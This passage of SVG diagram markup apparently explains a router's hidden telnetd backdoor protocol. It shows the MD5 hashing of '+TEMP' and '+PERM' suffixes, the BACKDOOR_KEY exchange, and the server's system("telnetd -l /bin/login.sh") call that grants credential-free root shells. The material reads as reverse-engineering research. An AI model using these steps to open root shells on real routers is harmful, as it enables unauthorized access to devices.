x="1124.5375252129438" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1297.3708534600141" y="2107.7312817990005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> begins with a null byte,</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">then the strings </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1176.1208534600141" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1333.7041817070844" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and  </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1396.654182470024" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1555.9208450676801" y="2129.0927014990007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> will</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="987.620853460014" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">just be </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1071.987522161186" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"+TEMP"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1171.4375191094282" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1178.404185807884" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1220.4541850449446" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1227.4208517434004" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"+PERM"</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1328.6208486916425" y="2150.454121199001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, respectively!</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 2158.998689079 L 1044.5846393266806 2158.998689079 L 1044.5846393266806 2186.7685346890003 L 976.7265294130141 2186.7685346890003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(959.1389605266808,2186.7685346890003) translate(-959.1389605266808,-2186.7685346890003)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 976.940143610014 2177.867943147334 L 959.1389605266808 2186.7685346890003 L 976.940143610014 2195.6691262306667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="984.416640505014" y="2218.8106642390003" width="669.8250824041406" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2240.1720839390005" width="595.1917487211267" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="984.416640505014" y="2261.5335036390006" width="131.32509003353516" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1124.3708534600141" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1174.7875213982466" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hashes of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1283.8541870476606" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1441.437515294731" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1491.7708473564985" y="2238.0359419690003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the 16-byte results as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1313.7708473564985" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1415.9041786553266" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1466.2375107170942" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1570.0541763665083" y="2259.3973616690005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="987.620853460014" y="2280.7587813690006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 959.1389605266808 2289.303349249 L 1044.5846393266806 2289.303349249 L 1044.5846393266806 2317.073194859 L 976.7265294130141 2317.073194859" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(959.1389605266808,2317.073194859) translate(-959.1389605266808,-2317.073194859)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 976.940143610014 2308.1726033173336 L 959.1389605266808 2317.073194859 L 976.940143610014 2325.9737864006665 Z"/></g></g><g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2349.115324409" width="496.85843811703126" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2370.4767441090003" width="318.9750948972742" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2391.8381638090004" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2413.1995835090006" width="488.59174881649415" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2434.561003209001" width="370.7084327764551" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2455.922422909001" width="489.37509117794434" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2477.283842609001" width="529.9750991888086" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2498.6452623090013" width="527.6250778265039" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2520.0066820090015" width="138.64176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2541.3681017090016" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2562.729521409002" width="558.4251075811426" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2584.090941109002" width="540.40842591" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2605.452360809002" width="72.47509155941407" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2626.8137805090023" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="141.4890802157728" y="2648.1752002090025" width="292.0917616910974" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2368.340602139" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">The Client is now expected to append one of two</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">suffixes to </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="253.8432946966517" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">xor(XOR_MASK,SECRET_PLAINTEXT)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="450.52662904723763" y="2389.7020218390003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2411.0634415390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">- "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="167.4599595831263" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="238.37662370666146" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to launch a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="378.5099550054896" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="460.17661912902474" y="2432.4248612390006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> session that will</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2453.786280939001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   last until the router is rebooted, </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="italic" font-weight="normal" text-decoration="normal" x="488.5432992742884" y="2453.786280939001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">or</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">-  "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="173.80995996459603" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="246.40995843871713" y="2475.147700639001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to write a flag to a physical volume,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   which the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="267.5432916448939" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="442.15996034606576" y="2496.509120339001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon will check for</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2517.8705400390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   when the system is rebooted, and launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="584.2432809637415" y="2517.8705400390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2539.2319597390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   if it finds it.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2560.5933794390016" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Remember that we have effectively set </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="469.7599740789759" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">xor(XOR_MASK,SECRET_PLAINTEXT)</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="666.4433084295619" y="2581.954799139002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2603.316218839002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the empty string, so the suffix is all we need to</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.6932931707728" y="2624.677638539002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">know.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2646.0390582390023" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="144.6932931707728" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="330.6099649237025" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="424.02662904723763" y="2667.4004779390025" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 105.53069038743945 2675.945045819 L 201.65707903743944 2675.945045819 L 201.65707903743944 2703.714891429 L 133.7989691237728 2703.714891429" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(116.21140023743945,2703.714891429) translate(-116.21140023743945,-2703.714891429)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 134.0125833207728 2694.8142998873336 L 116.21140023743945 2703.714891429 L 134.0125833207728 2712.6154829706666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2735.757020979" width="480.60842667293946" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2757.1184406790003" width="302.35841665935914" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2778.4798603790005" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2799.8412800790006" width="501.35843811703126" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="152.1697900657728" y="2821.202699779001" width="293.15842591" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="292.12400302077276" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="342.5406709590052" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hash of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="428.8906694331263" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="522.3073335566614" y="2754.982298709" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="282.07399996901495" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="444.9739938654993" y="2776.3437184090003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="155.3740030207728" y="2797.7051381090005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="155.3740030207728" y="2819.0665578090006" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Here, all we need to do is compute the MD5</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="155.3740030207728" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">hash of </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="245.607332793722" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="324.22400149489386" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> or </text><text fill="darkred" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="361.7573343196009" y="2840.427977509001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 116.21140023743945 2848.972545389 L 212.33778888743944 2848.972545389 L 212.33778888743944 2876.7423909990002 L 144.4796789737728 2876.7423909990002" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(126.89211008743945,2876.7423909990002) translate(-126.89211008743945,-2876.7423909990002)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 144.6932931707728 2867.8417994573338 L 126.89211008743945 2876.7423909990002 L 144.6932931707728 2885.6429825406667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="375.47930444793406" y="2908.7845205490003" width="324.39175186825196" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="378.68351740293406" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="435.41685099058054" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="598.3168448870649" y="2928.0097982790003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 126.89211008743945 2936.5543661590004 L 930.8706817903475 2936.5543661590004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(948.4582506766808,2936.5543661590004) translate(-948.4582506766808,-2936.5543661590004)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 930.6570675933475 2927.653774617334 L 948.4582506766808 2936.5543661590004 L 930.6570675933475 2945.454957700667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="995.097350355014" y="2968.5964957090005" width="444.4750834531824" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="2989.9579154090006" width="423.8250838346521" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3011.319335109001" width="409.64176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3032.680754809001" width="394.2250877447168" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3054.042174509001" width="183.6084228582422" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3075.4035942090013" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3096.7650139090015" width="446.1584178037683" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3118.1264336090017" width="442.9917555875818" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3139.487853309002" width="436.6250868864099" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3160.849273009002" width="464.625093085293" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3182.210692709002" width="484.7417541570703" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="995.097350355014" y="3203.5721124090023" width="445.4917465276758" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="998.301563310014" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1014.4348965161907" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1020.7848964208233" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1183.6848903173077" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1282.3682246678936" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1384.5015559667218" y="2987.8217734390005" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1039.0015640729534" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">system("</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1139.3515625470745" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd -l /bin/login.sh</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1389.818222092973" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">")</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1409.3682213300335" y="3009.1831931390007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">launching an unencrypted </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1267.0182381147015" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1348.6849022382366" y="3030.544612839001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> shell</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1027.3182297223675" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">root</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1074.2182312482464" y="3051.906032539001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. No credentials are required to</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3073.267452239001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">log into this shell.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3094.6288719390013" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="998.301563310014" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1014.4348965161907" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1020.7848964208233" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">BACKDOOR_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1183.6848903173077" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> matches </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1282.3682246678936" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1386.1848903173077" y="3115.9902916390015" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> then</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="998.301563310014" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">call </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1039.0015640729534" y="3137.3517113390017" text-anchor="start" dominant-baseline="alphabetic" 